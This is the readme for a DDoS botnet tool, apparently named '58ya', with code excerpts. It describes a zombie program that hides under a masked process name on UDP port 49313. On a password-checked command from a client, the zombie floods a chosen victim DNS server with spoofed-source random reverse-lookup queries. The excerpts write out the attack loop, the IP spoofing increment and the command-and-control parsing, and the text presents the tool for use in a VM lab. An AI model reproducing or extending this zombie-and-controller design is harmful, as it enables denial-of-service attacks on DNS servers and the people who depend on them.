=================================================================================
※ This file was coded by Extirpater ( extirpater@crosswinds.net )
server.c -- running in zombie PC
client.c -- send a attack command to zombie PC
environment -> three PC is same network.
attacker, zombie : VM( vmware : bridged )
DNS server : real PC (58ya server)
zombie is one -_-;
=================================================================================
< zombie PC >
- compile a source(server.c) and run in a background mode
- # netstat -apnu
- opened UDP port 49313 ( 58ya is mask name, default port is 49313 n default name is vi -0- )
=================================================================================
< attacker PC>
- compile a source(client.c) and send a attack CMD to zombie PC
=================================================================================
< captured packets >
src address dst address
(spoofed IP ) (victim DNS server)
- spoofed IP is in sequence (-> can modify a start IP in a source file)
=================================================================================
< victim DNS server >
-
top CMD n monitoring
=================================================================================
<client.c>
...
...
// input a DNS server address(victim)
sscanf(argv[3], "%d.%d.%d.%d", &ip[0], &ip[1], &ip[2], &ip[3]);
...
...
// input a DNS server address(victim) to command (arrange)
// on_off : check value (attack | stop)
sprintf(command, "%c%c%c%c%c%s", on_off, ip[0], ip[1], ip[2], ip[3], PASSWORD);
...
...
=================================================================================
<server.c>
...
...
while(1)
{
if(running==1)
{
// make a random queries
sprintf(namez,"\3%d\3%d\3%d\3%d\07in-addr\04arpa",myrand(),myrand(),myrand(),myrand());
strcpy(data,namez);
*((u_short *)(data+strlen(namez)+1))=ntohs(12);
*((u_short *)(data+strlen(namez)+3))=ntohs(1);
udp_send(sraw,s_ip,d_ip,2600+myrand(),53,buffer2,14+strlen(namez)+5);
usleep(30);
s_ip=ntohl(s_ip);
s_ip++;
// src_ip++
s_ip=htonl(s_ip);
}
if(get_pkt(sockfd, command, 25)>5)
{
memset(passw0rd, 0, sizeof(passw0rd));
for(i=5;i<26;i++)
// swap password value bcoz passwd check
{
passw0rd[i-5]=command[i];
if(command[i]==0) break;
}
if(strstr(passw0rd, PASSWORD)!=0)
// passwd check
{
running=command[0];
memset(dest_ip, 0, sizeof(dest_ip));
// DNS server address(victim)
sprintf(dest_ip, "%d.%d.%d.%d", command[1], command[2], command[3], command[4]);
d_ip=host2ip(dest_ip);
}
}
}
...
...
=================================================================================
Cheeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeer up!!!!!!!!!!!!!!
=================================================================================
